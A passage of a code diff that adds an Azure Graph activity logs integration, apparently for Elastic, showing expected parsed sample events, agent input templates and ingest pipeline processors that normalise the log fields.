"ConsentRequest.ReadWrite.All", + "CustomSecAttributeAuditLogs.Read.All", + "Directory.AccessAsUser.All", + "Directory.Read.All", + "Directory.ReadWrite.All", + "Directory.Write.Restricted", + "DirectoryRecommendations.Read.All", + "DirectoryRecommendations.ReadWrite.All", + "email", + "EntitlementManagement.Read.All", + "Group.ReadWrite.All", + "IdentityProvider.ReadWrite.All", + "IdentityRiskEvent.ReadWrite.All", + "IdentityRiskyServicePrincipal.ReadWrite.All", + "IdentityRiskyUser.ReadWrite.All", + "IdentityUserFlow.Read.All", + "LifecycleWorkflows.ReadWrite.All", + "openid", + "Policy.Read.All", + "Policy.Read.IdentityProtection", + "Policy.ReadWrite.AuthenticationFlows", + "Policy.ReadWrite.AuthenticationMethod", + "Policy.ReadWrite.ConditionalAccess", + "Policy.ReadWrite.ExternalIdentities", + "Policy.ReadWrite.IdentityProtection", + "Policy.ReadWrite.MobilityManagement", + "profile", + "Reports.Read.All", + "RoleManagement.ReadWrite.Directory", + "RoleManagement.ReadWrite.Exchange", + "SecurityEvents.ReadWrite.All", + "TrustFrameworkKeySet.Read.All", + "User.Export.All", + "User.ReadWrite.All", + "UserAuthenticationMethod.ReadWrite.All" + ], + "sign_in_activity_id": "signin_Activity-Id", + "time_generated": "2024-03-07T16:42:12.048Z", + "token_issued_at": "2024-03-07T16:36:51.000Z", + "wids": [ + "a207b4d3-0g8d-90cb-bhj5-d80n3122e67", + "a207b4d3-0g8d-90cb-bhj5-d80n3122e69", + "a207b4d3-0g8d-90cb-bhj5-d80n3122e89" + ] + }, + "result_signature": "200" + }, + "resource": { + "id": "/TENANTS/AB47545B-420E-46FG-C4DC-8F7697K1AADB/PROVIDERS/MICROSOFT.AADIAM", + "provider": "MICROSOFT.AADIAM" + }, + "tenant_id": "ab47545b-420e-46fg-c4dc-8f7697k1aadb" + }, + "client": { + "geo": { + "continent_name": "Europe", + "country_iso_code": "NO", + "country_name": "Norway", + "location": { + "lat": 62.0, + "lon": 10.0 + } + }, + "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", + "user": { + "id": "285e0849-a706-4a9a-9eb1-f4e21cc78793" + } + }, + "cloud": { + "account": { + "id": "ab47545b-420e-46fg-c4dc-8f7697k1aadb" + }, + "provider": "azure", + "region": "UK South", + "service": { + "name": "Microsoft Graph" + } + }, + "destination": { + "geo": { + "region_name": "UK South" + } + }, + "ecs": { + "version": "8.0.0" + }, + "event": { + "action": "Microsoft Graph Activity", + "duration": 435442688, + "kind": "event", + "original": "{\"Level\":4,\"callerIpAddress\":\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\",\"category\":\"MicrosoftGraphActivityLogs\",\"correlationId\":\"f7749da0-e6g1-4f3f-975a-64937fbge347\",\"durationMs\":846544,\"location\":\"UK South\",\"operationName\":\"Microsoft Graph Activity\",\"operationVersion\":\"beta\",\"properties\":{\"apiVersion\":\"beta\",\"appId\":\"a5a68e32-269a-3c91-a5e2-b9254e67hb29\",\"atContent\":\"\",\"clientAuthMethod\":\"0\",\"clientRequestId\":\"2fe56789-a848-4c93-9d2d-5675972ardk9\",\"durationMs\":846544,\"identityProvider\":null,\"ipAddress\":\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\",\"location\":\"UK South\",\"operationId\":\"f7749da0-e6g1-4f3f-975a-64937fbge347\",\"requestId\":\"f7749da0-e6g1-4f3f-975a-64937fbge347\",\"requestMethod\":\"GET\",\"requestUri\":\"https://graph.microsoft.com/beta/devices?$select=displayName,id,deviceId\\\\u0026$search=%22displayName:a%22\\\\u0026$top=30\",\"responseSizeBytes\":0,\"responseStatusCode\":200,\"roles\":null,\"scopes\":\"AccessReview.ReadWrite.All AuditLog.Read.All ChangeManagement.Read.All ConsentRequest.Create ConsentRequest.Read ConsentRequest.ReadApprove.All ConsentRequest.ReadWrite.All CustomSecAttributeAuditLogs.Read.All Directory.AccessAsUser.All Directory.Read.All Directory.ReadWrite.All Directory.Write.Restricted DirectoryRecommendations.Read.All DirectoryRecommendations.ReadWrite.All email EntitlementManagement.Read.All Group.ReadWrite.All IdentityProvider.ReadWrite.All IdentityRiskEvent.ReadWrite.All IdentityRiskyServicePrincipal.ReadWrite.All IdentityRiskyUser.ReadWrite.All IdentityUserFlow.Read.All LifecycleWorkflows.ReadWrite.All openid Policy.Read.All Policy.Read.IdentityProtection Policy.ReadWrite.AuthenticationFlows Policy.ReadWrite.AuthenticationMethod Policy.ReadWrite.ConditionalAccess Policy.ReadWrite.ExternalIdentities Policy.ReadWrite.IdentityProtection Policy.ReadWrite.MobilityManagement profile Reports.Read.All RoleManagement.ReadWrite.Directory RoleManagement.ReadWrite.Exchange SecurityEvents.ReadWrite.All TrustFrameworkKeySet.Read.All User.Export.All User.ReadWrite.All UserAuthenticationMethod.ReadWrite.All\",\"servicePrincipalId\":null,\"signInActivityId\":\"signin_Activity-Id\",\"tenantId\":\"ab47545b-420e-46fg-c4dc-8f7697k1aadb\",\"timeGenerated\":\"2024-03-07T16:42:12.0485843Z\",\"tokenIssuedAt\":\"2024-03-07T16:36:51Z\",\"userAgent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0\",\"userId\":\"285e0849-a706-4a9a-9eb1-f4e21cc78793\",\"wids\":\"a207b4d3-0g8d-90cb-bhj5-d80n3122e67 a207b4d3-0g8d-90cb-bhj5-d80n3122e69 a207b4d3-0g8d-90cb-bhj5-d80n3122e89\"},\"resourceId\":\"/TENANTS/AB47545B-420E-46FG-C4DC-8F7697K1AADB/PROVIDERS/MICROSOFT.AADIAM\",\"resultSignature\":\"200\",\"tenantId\":\"ab47545b-420e-46fg-c4dc-8f7697k1aadb\",\"time\":\"2024-03-07T16:42:12.0485843Z\"}", + "type": [ + "access" + ] + }, + "http": { + "request": { + "id": "f7749da0-e6g1-4f3f-975a-64937fbge347", + "method": "GET" + }, + "response": { + "bytes": 0, + "status_code": 200 + } + }, + "log": { + "level": "4" + }, + "related": { + "ip": [ + "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" + ], + "user": [ + "285e0849-a706-4a9a-9eb1-f4e21cc78793" + ] + }, + "source": { + "geo": { + "continent_name": "Europe", + "country_iso_code": "NO", + "country_name": "Norway", + "location": { + "lat": 62.0, + "lon": 10.0 + } + }, + "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" + }, + "tags": [ + "preserve_original_event" + ], + "url": { + "domain": "graph.microsoft.com", + "original": "https://graph.microsoft.com/beta/devices?$select=displayName,id,deviceId\\u0026$search=%22displayName:a%22\\u0026$top=30", + "path": "/beta/devices", + "query": "$select=displayName,id,deviceId\\u0026$search=%22displayName:a%22\\u0026$top=30", + "scheme": "https" + }, + "user": { + "id": "285e0849-a706-4a9a-9eb1-f4e21cc78793" + }, + "user_agent": { + "device": { + "name": "Other" + }, + "name": "Edge", + "original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0", + "os": { + "full": "Windows 10", + "name": "Windows", + "version": "10" + }, + "version": "122.0.0.0" + } + }, + { + "@timestamp": "2024-03-07T10:24:44.793Z", + "azure": { + "correlation_id": "f7839da0-e7d1-4e4f-985a-64937fbge347", + "graphactivitylogs": { + "category": "MicrosoftGraphActivityLogs", + "operation_name": "Microsoft Graph Activity", + "operation_version": "v1.0", + "properties": { + "api_version": "v1.0", + "app_id": "a5a68e32-269a-3c91-a5e2-b9254e67hb29", + "client_auth_method": 2, + "client_request_id": "2fe58790-a848-4a93-9d2c-5645972aejk9", + "identity_provider": "https://sts.windows.net/ab30785b-417f-42a4-b5dc-8f9051718acb/", + "operation_id": "f7839da0-e7d1-4e4f-985a-64937fbge347", + "roles": [ + "Application.Read.All", + "Domain.Read.All", + "GroupMember.Read.All", + "LicenseAssignment.ReadWrite.All", + "Organization.Read.All", + "Policy.Read.ConditionalAccess", + "RoleManagement.Read.Directory", + "Team.ReadBasic.All", + "TeamsTab.Create", + "TeamsTab.Read.All", + "TeamsTab.ReadWrite.All", + "User.Read.All" + ], + "service_principal_id": "f2aq4c71-31e3-5065-91g3-4b2dfbsv50fg", + "sign_in_activity_id": "sign-in_ActivityId", + "time_generated": "2024-03-07T10:24:44.793Z", + "token_issued_at": "2024-03-07T10:19:44.000Z", + "wids": [ + "a207b4d3-0g8d-90cb-bhj5-d80n3121e69" + ] + }, + "result_signature": "200" + }, + "resource": { + "id": "/TENANTS/AB30785B-417F-42A4-B5DC-8F9051718ACB/PROVIDERS/MICROSOFT.AADIAM", + "provider": "MICROSOFT.AADIAM" + }, + "tenant_id": "ab30785b-417f-42a4-b5dc-8f9051718acb" + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.143" + }, + "cloud": { + "account": { + "id": "ab30785b-417f-42a4-b5dc-8f9051718acb" + }, + "provider": "azure", + "region": "France Central", + "service": { + "name": "Microsoft Graph" + } + }, + "destination": { + "geo": { + "region_name": "France Central" + } + }, + "ecs": { + "version": "8.0.0" + }, + "event": { + "action": "Microsoft Graph Activity", + "duration": 1213372224, + "kind": "event", + "original": "{\"Level\":4,\"callerIpAddress\":\"81.2.69.143\",\"category\":\"MicrosoftGraphActivityLogs\",\"correlationId\":\"f7839da0-e7d1-4e4f-985a-64937fbge347\",\"durationMs\":1100725,\"location\":\"France Central\",\"operationName\":\"Microsoft Graph Activity\",\"operationVersion\":\"v1.0\",\"properties\":{\"apiVersion\":\"v1.0\",\"appId\":\"a5a68e32-269a-3c91-a5e2-b9254e67hb29\",\"atContent\":\"\",\"clientAuthMethod\":\"2\",\"clientRequestId\":\"2fe58790-a848-4a93-9d2c-5645972aejk9\",\"durationMs\":1100725,\"identityProvider\":\"https://sts.windows.net/ab30785b-417f-42a4-b5dc-8f9051718acb/\",\"ipAddress\":\"81.2.69.143\",\"location\":\"France Central\",\"operationId\":\"f7839da0-e7d1-4e4f-985a-64937fbge347\",\"requestId\":\"f7839da0-e7d1-4e4f-985a-64937fbge347\",\"requestMethod\":\"GET\",\"requestUri\":\"https://graph.microsoft.com/v1.0/directoryRoles\",\"responseSizeBytes\":4300,\"responseStatusCode\":200,\"roles\":\"Application.Read.All Domain.Read.All GroupMember.Read.All LicenseAssignment.ReadWrite.All Organization.Read.All Policy.Read.ConditionalAccess RoleManagement.Read.Directory Team.ReadBasic.All TeamsTab.Create TeamsTab.Read.All TeamsTab.ReadWrite.All User.Read.All\",\"scopes\":null,\"servicePrincipalId\":\"f2aq4c71-31e3-5065-91g3-4b2dfbsv50fg\",\"signInActivityId\":\"sign-in_ActivityId\",\"tenantId\":\"ab30785b-417f-42a4-b5dc-8f9051718acb\",\"timeGenerated\":\"2024-03-07T10:24:44.7939418Z\",\"tokenIssuedAt\":\"2024-03-07T10:19:44Z\",\"userAgent\":\"\",\"userId\":null,\"wids\":\"a207b4d3-0g8d-90cb-bhj5-d80n3121e69\"},\"resourceId\":\"/TENANTS/AB30785B-417F-42A4-B5DC-8F9051718ACB/PROVIDERS/MICROSOFT.AADIAM\",\"resultSignature\":\"200\",\"tenantId\":\"ab30785b-417f-42a4-b5dc-8f9051718acb\",\"time\":\"2024-03-07T10:24:44.7939418Z\"}", + "type": [ + "access" + ] + }, + "http": { + "request": { + "id": "f7839da0-e7d1-4e4f-985a-64937fbge347", + "method": "GET" + }, + "response": { + "bytes": 4300, + "status_code": 200 + } + }, + "log": { + "level": "4" + }, + "related": { + "ip": [ + "81.2.69.143" + ] + }, + "source": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.143" + }, + "tags": [ + "preserve_original_event" + ], + "url": { + "domain": "graph.microsoft.com", + "extension": "0/directoryRoles", + "original": "https://graph.microsoft.com/v1.0/directoryRoles", + "path": "/v1.0/directoryRoles", + "scheme": "https" + } + } + ] +} \ No newline at end of file diff --git a/packages/azure/data_stream/graphactivitylogs/_dev/test/pipeline/test-common-config.yml b/packages/azure/data_stream/graphactivitylogs/_dev/test/pipeline/test-common-config.yml new file mode 100644 index 00000000000..4da22641654 --- /dev/null +++ b/packages/azure/data_stream/graphactivitylogs/_dev/test/pipeline/test-common-config.yml @@ -0,0 +1,3 @@ +fields: + tags: + - preserve_original_event diff --git a/packages/azure/data_stream/graphactivitylogs/agent/stream/azure-eventhub.yml.hbs b/packages/azure/data_stream/graphactivitylogs/agent/stream/azure-eventhub.yml.hbs new file mode 100644 index 00000000000..c49f35bb0b4 --- /dev/null +++ b/packages/azure/data_stream/graphactivitylogs/agent/stream/azure-eventhub.yml.hbs @@ -0,0 +1,46 @@ +{{#if connection_string}} +connection_string: {{connection_string}} +{{/if}} +{{#if storage_account_container}} +storage_account_container: {{storage_account_container}} +{{else}} +{{#if eventhub}} +storage_account_container: filebeat-graphactivitylogs-{{eventhub}} +{{/if}} +{{/if}} +{{#if eventhub}} +eventhub: {{eventhub}} +{{/if}} +{{#if consumer_group}} +consumer_group: {{consumer_group}} +{{/if}} +{{#if storage_account}} +storage_account: {{storage_account}} +{{/if}} +{{#if storage_account_key}} +storage_account_key: {{storage_account_key}} +{{/if}} +{{#if resource_manager_endpoint}} +resource_manager_endpoint: {{resource_manager_endpoint}} +{{/if}} +tags: +{{#if preserve_original_event}} + - preserve_original_event +{{/if}} +{{#each tags as |tag|}} + - {{tag}} +{{/each}} +{{#contains "forwarded" tags}} +publisher_pipeline.disable_host: true +{{/contains}} +{{#if processors}} +processors: +{{processors}} +{{/if}} +sanitize_options: +{{#if sanitize_newlines}} + - NEW_LINES +{{/if}} +{{#if sanitize_singlequotes}} + - SINGLE_QUOTES +{{/if}} diff --git a/packages/azure/data_stream/graphactivitylogs/agent/stream/log.yml.hbs b/packages/azure/data_stream/graphactivitylogs/agent/stream/log.yml.hbs new file mode 100644 index 00000000000..f7c4bb1e4d7 --- /dev/null +++ b/packages/azure/data_stream/graphactivitylogs/agent/stream/log.yml.hbs @@ -0,0 +1,19 @@ +paths: + {{#each paths as |path|}} +- {{path}} + {{/each}} +exclude_files: [".gz$"] +tags: +{{#if preserve_original_event}} + - preserve_original_event +{{/if}} +{{#each tags as |tag|}} + - {{tag}} +{{/each}} +{{#contains "forwarded" tags}} +publisher_pipeline.disable_host: true +{{/contains}} +{{#if processors}} +processors: +{{processors}} +{{/if}} diff --git a/packages/azure/data_stream/graphactivitylogs/elasticsearch/ingest_pipeline/azure-shared-pipeline.yml b/packages/azure/data_stream/graphactivitylogs/elasticsearch/ingest_pipeline/azure-shared-pipeline.yml new file mode 100644 index 00000000000..5dceb3d325b --- /dev/null +++ b/packages/azure/data_stream/graphactivitylogs/elasticsearch/ingest_pipeline/azure-shared-pipeline.yml @@ -0,0 +1,91 @@ +--- +description: Pipeline for parsing Azure shared log fields. +processors: + - set: + field: cloud.provider + value: azure + - grok: + field: azure.resource_id + patterns: + - /SUBSCRIPTIONS/%{SUBID:azure.subscription_id}/RESOURCEGROUPS/%{GROUPID:azure.resource.group}/PROVIDERS/%{PROVIDERNAME:azure.resource.provider}/NAMESPACES/%{NAMESPACE:azure.resource.namespace}/AUTHORIZATIONRULES/%{RULE:azure.resource.authorization_rule} + - /subscriptions/%{SUBID:azure.subscription_id}/resourceGroups/%{GROUPID:azure.resource.group}/providers/%{PROVIDERNAME:azure.resource.provider}/namespaces/%{NAMESPACE:azure.resource.namespace}/authorizationRules/%{RULE:azure.resource.authorization_rule} + pattern_definitions: + SUBID: (\{){0,1}[0-9a-fA-F]{8}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{12}(\}){0,1} + GROUPID: .+ + PROVIDERNAME: .+ + NAMESPACE: .+ + RULE: .+ + ignore_failure: true + - grok: + field: azure.resource_id + if: 'ctx.azure?.subscription_id == null' + patterns: + - /SUBSCRIPTIONS/%{SUBID:azure.subscription_id}/RESOURCEGROUPS/%{GROUPID:azure.resource.group}/PROVIDERS/%{PROVIDERNAME:azure.resource.provider}/%{NAME:azure.resource.name} + - /subscriptions/%{SUBID:azure.subscription_id}/resourceGroups/%{GROUPID:azure.resource.group}/providers/%{PROVIDERNAME:azure.resource.provider}/%{NAME:azure.resource.name} + pattern_definitions: + SUBID: (\{){0,1}[0-9a-fA-F]{8}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{12}(\}){0,1} + GROUPID: .+ + PROVIDERNAME: ([A-Za-z])\w+.([A-Za-z])\w+/([A-Za-z])\w+. + NAME: ((?!AUTHORIZATIONRULES).)*$ + ignore_failure: true + - grok: + field: azure.resource_id + if: 'ctx.azure?.subscription_id == null' + patterns: + - /SUBSCRIPTIONS/%{SUBID:azure.subscription_id}/RESOURCEGROUPS/%{GROUPID:azure.resource.group}/PROVIDERS/%{PROVIDERNAME:azure.resource.provider}/%{NAME:azure.resource.name} + - /subscriptions/%{SUBID:azure.subscription_id}/resourceGroups/%{GROUPID:azure.resource.group}/providers/%{PROVIDERNAME:azure.resource.provider}/%{NAME:azure.resource.name} + pattern_definitions: + SUBID: (\{){0,1}[0-9a-fA-F]{8}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{12}(\}){0,1} + GROUPID: .+ + PROVIDERNAME: ([A-Za-z])\w+.([A-Za-z])\w+\/([A-Za-z][^\/])\w+ + NAME: .+ + ignore_failure: true + - grok: + field: azure.resource_id + if: 'ctx.azure?.subscription_id == null' + patterns: + - /providers/%{PROVIDER:azure.resource.provider} + - /PROVIDERS/%{PROVIDER:azure.resource.provider} + pattern_definitions: + PROVIDER: .+ + ignore_failure: true + - grok: + field: azure.resource_id + if: 'ctx.azure?.subscription_id == null' + patterns: + - /SUBSCRIPTIONS/%{SUBID:azure.subscription_id}/PROVIDERS/%{PROVIDERNAME:azure.resource.provider} + - /subscriptions/%{SUBID:azure.subscription_id}/providers/%{PROVIDERNAME:azure.resource.provider} + pattern_definitions: + SUBID: (\{){0,1}[0-9a-fA-F]{8}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{12}(\}){0,1} + PROVIDERNAME: ([A-Za-z])\w+.([A-Za-z])\w+\/([A-Za-z][^\/])\w+ + ignore_failure: true + - grok: + field: azure.resource_id + if: 'ctx.azure?.subscription_id == null' + patterns: + - /SUBSCRIPTIONS/%{SUBID:azure.subscription_id}/RESOURCEGROUPS/%{GROUPID:azure.resource.group} + - /subscriptions/%{SUBID:azure.subscription_id}/resourceGroups/%{GROUPID:azure.resource.group} + pattern_definitions: + SUBID: (\{){0,1}[0-9a-fA-F]{8}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{12}(\}){0,1} + GROUPID: .+ + ignore_failure: true + - grok: + field: azure.resource_id + if: 'ctx.azure?.subscription_id == null' + patterns: + - /SUBSCRIPTIONS/%{SUBID:azure.subscription_id} + - /subscriptions/%{SUBID:azure.subscription_id} + pattern_definitions: + SUBID: (\{){0,1}[0-9a-fA-F]{8}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{12}(\}){0,1} + ignore_failure: true + - rename: + field: azure.resource_id + target_field: azure.resource.id + ignore_missing: true + - lowercase: + field: event.outcome + ignore_missing: true +on_failure: + - set: + field: error.message + value: '{{ _ingest.on_failure_message }}' diff --git a/packages/azure/data_stream/graphactivitylogs/elasticsearch/ingest_pipeline/default.yml b/packages/azure/data_stream/graphactivitylogs/elasticsearch/ingest_pipeline/default.yml new file mode 100644 index 00000000000..7cbacb283df --- /dev/null +++ b/packages/azure/data_stream/graphactivitylogs/elasticsearch/ingest_pipeline/default.yml @@ -0,0 +1,466 @@ +--- +description: Pipeline for parsing azure graph activity logs. +processors: + - set: + field: ecs.version + value: '8.0.0' + tag: set-ecs_version + - set: + field: event.kind + value: event + tag: set-event_kind + - append: + field: event.type + value: access + tag: append-event_type + - rename: + field: azure + target_field: azure-eventhub + ignore_missing: true + tag: rename-azure + - rename: + field: message + target_field: event.original + ignore_missing: true + if: 'ctx.event?.original == null' + tag: rename-message + description: 'Renames the original `message` field to `event.original` to store a copy of the original message. The `event.original` field is not touched if the document already has one; it may happen when Logstash sends the document.' + - remove: + field: message + ignore_missing: true + if: 'ctx.event?.original != null' + description: 'The `message` field is no longer required if the document has an `event.original` field.' + tag: remove-message + - json: + field: event.original + target_field: azure.graphactivitylogs + tag: json-event_original + - script: + description: Convert Azure JSON keys to snake case. + tag: azure-json-keys-to-snake-case + lang: painless + source: | + Map keysToSnakeCase(Map m) { + def regex = /_?([a-z])([A-Z]+)/; + def out = [:]; + + for (entry in m.entrySet()) { + def k = entry.getKey(); + def v = entry.getValue(); + + if (v instanceof Map) { + v = keysToSnakeCase(v); + } else if (v instanceof List) { + for (int i = 0; i < v.size(); i++) { + def item = v.get(i); + if (item instanceof Map) { + v.set(i, keysToSnakeCase(item)); + } + } + } + + k = regex.matcher(k).replaceAll('$1_$2').toLowerCase(); + out.put(k, v); + } + + return out; + } + + ctx.azure['graphactivitylogs'] = keysToSnakeCase(ctx.azure.graphactivitylogs); + - date: + field: azure.graphactivitylogs.time + target_field: '@timestamp' + if: ctx.azure?.graphactivitylogs?.time != null + tag: date-time + formats: + - ISO8601 + - remove: + field: azure.graphactivitylogs.time + ignore_missing: true + tag: remove-time + - date: + field: azure.graphactivitylogs.properties.token_issued_at + target_field: azure.graphactivitylogs.properties.token_issued_at + if: ctx.azure?.graphactivitylogs?.properties?.token_issued_at != null + tag: date-token_issued_at + formats: + - ISO8601 + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - rename: + field: azure.graphactivitylogs.resource_id + target_field: azure.resource_id + ignore_missing: true + tag: rename-resource_id + - convert: + field: azure.graphactivitylogs.caller_ip_address + target_field: source.ip + type: ip + ignore_missing: true + tag: convert-caller_ip_address + on_failure: + - rename: + field: azure.graphactivitylogs.caller_ip_address + target_field: source.address + ignore_missing: true + tag: rename-caller_ip_address + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: azure.graphactivitylogs.properties.ip_address + target_field: source.ip + type: ip + ignore_missing: true + tag: convert-properties_ip_address + if: ctx.source?.ip == null + on_failure: + - rename: + field: azure.graphactivitylogs.properties.ip_address + target_field: source.address + ignore_missing: true + tag: rename-properties_ip_address + if: ctx.source?.address == null + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + + - remove: + field: + - azure.graphactivitylogs.caller_ip_address + - azure.graphactivitylogs.properties.ip_address + if: 'ctx.source?.ip != null' + tag: remove-caller_ip_address + ignore_missing: true + - set: + field: client.ip + value: '{{source.ip}}' + tag: set-client_ip + ignore_empty_value: true + - append: + field: related.ip + tag: append-related_ip + value: '{{source.ip}}' + allow_duplicates: false + if: 'ctx.source?.ip != null' + - convert: + field: azure.graphactivitylogs.level + target_field: log.level + type: string + tag: convert-level + ignore_missing: true + - remove: + field: azure.graphactivitylogs.level + ignore_missing: true + tag: remove-level + - rename: + field: azure.graphactivitylogs.duration_ms + target_field: event.duration + if: ctx.azure?.graphactivitylogs?.duration_ms != null + tag: rename-duration_ms + - rename: + field: azure.graphactivitylogs.properties.duration_ms + target_field: event.duration + if: ctx.azure?.graphactivitylogs?.properties?.durationMs != null && ctx.event?.duration == null + tag: rename-properties-durationMs + - script: + lang: painless + source: | + if (ctx.event.duration!= null) { + ctx.event.duration = ctx.event.duration * 1000000; + } + ignore_failure: true + tag: script-duration + - remove: + field: + - azure.graphactivitylogs.duration_ms + - azure.graphactivitylogs.properties.duration_ms + tag: remove-duration_ms + if: ctx.event?.duration != null + ignore_missing: true + - rename: + field: azure.graphactivitylogs.location + target_field: destination.geo.region_name + ignore_missing: true + tag: rename-location + - rename: + field: azure.graphactivitylogs.properties.location + target_field: destination.geo.region_name + if: ctx.destination?.geo?.region_name == null && ctx.azure?.graphactivitylogs?.properties?.location != null + tag: rename-properties-location + - remove: + field: + - azure.graphactivitylogs.location + - azure.graphactivitylogs.properties.location + tag: remove-location + if: ctx.destination?.geo?.region_name != null + ignore_missing: true + - convert: + field: azure.graphactivitylogs.operation_name + target_field: event.action + type: string + ignore_missing: true + tag: convert-operation_name + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - rename: + field: azure.graphactivitylogs.tenant_id + target_field: azure.tenant_id + ignore_missing: true + tag: rename-tenant_id + - rename: + field: azure.graphactivitylogs.properties.tenant_id + target_field: azure.tenant_id + ignore_missing: true + if: ctx.azure?.tenant_id == null + tag: rename-properties_tenant_id + - remove: + field: + - azure.graphactivitylogs.tenant_id + - azure.graphactivitylogs.properties.tenant_id + tag: remove-tenant_id + if: ctx.azure?.tenant_id != null + ignore_missing: true + - rename: + field: azure.graphactivitylogs.correlation_id + target_field: azure.correlation_id + ignore_missing: true + tag: rename-correlation_id + - rename: + field: azure.graphactivitylogs.properties.request_id + target_field: http.request.id + ignore_missing: true + tag: rename-properties_request_id + - rename: + field: azure.graphactivitylogs.properties.request_method + target_field: http.request.method + ignore_missing: true + tag: rename-properties_request_methods + - uri_parts: + field: azure.graphactivitylogs.properties.request_uri + if: ctx.azure?.graphactivitylogs?.properties?.request_uri != null + keep_original: true + tag: uri_parts-properties-request_uri + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - remove: + field: azure.graphactivitylogs.properties.request_uri + tag: remove-properties_request_uri + if: ctx.url?.original != null + ignore_missing: true + - rename: + field: azure.graphactivitylogs.properties.response_size_bytes + target_field: http.response.bytes + ignore_missing: true + tag: rename-properties_response_bytes + - rename: + field: azure.graphactivitylogs.properties.response_status_code + target_field: http.response.status_code + ignore_missing: true + tag: rename-properties_response_statuscode + - split: + field: azure.graphactivitylogs.properties.roles + if: ctx.azure?.graphactivitylogs?.properties?.roles != null && ctx.azure.graphactivitylogs.properties.roles != '' + separator: ' ' + tag: split-properties_roles + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - split: + field: azure.graphactivitylogs.properties.scopes + if: ctx.azure?.graphactivitylogs?.properties?.scopes != null && ctx.azure.graphactivitylogs.properties.scopes != '' + separator: ' ' + tag: split-properties_scopes + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - split: + field: azure.graphactivitylogs.properties.wids + if: ctx.azure?.graphactivitylogs?.properties?.wids != null && ctx.azure.graphactivitylogs.properties.wids != '' + separator: ' ' + tag: split-properties_wids + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - user_agent: + field: azure.graphactivitylogs.properties.user_agent + if: ctx.azure?.graphactivitylogs?.properties?.user_agent != null && ctx.azure.graphactivitylogs.properties.user_agent != '' + tag: user_agent-properties_user_agent + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - remove: + field: azure.graphactivitylogs.properties.user_agent + tag: remove-properties_user_agent + if: ctx.user_agent != null + ignore_missing: true + - rename: + field: azure.graphactivitylogs.properties.user_id + target_field: user.id + tag: rename-properties_user_id + if: ctx.azure?.graphactivitylogs?.properties?.user_id != null && ctx.azure.graphactivitylogs.properties.user_id != '' + - set: + field: client.user.id + value: '{{user.id}}' + tag: set-client_ip + ignore_empty_value: true + - append: + field: related.user + value: '{{user.id}}' + tag: append-related_user + allow_duplicates: false + if: 'ctx.user?.id != null' + - rename: + field: azure.graphactivitylogs.properties._billed_size + target_field: azure.graphactivitylogs.properties.billed_size + if: ctx.azure?.graphactivitylogs?.properties?._billed_size != null + tag: rename-properties_billed_size + - rename: + field: azure.graphactivitylogs.properties._is_billable + target_field: azure.graphactivitylogs.properties.is_billable + if: ctx.azure?.graphactivitylogs?.properties?._is_billable != null + tag: 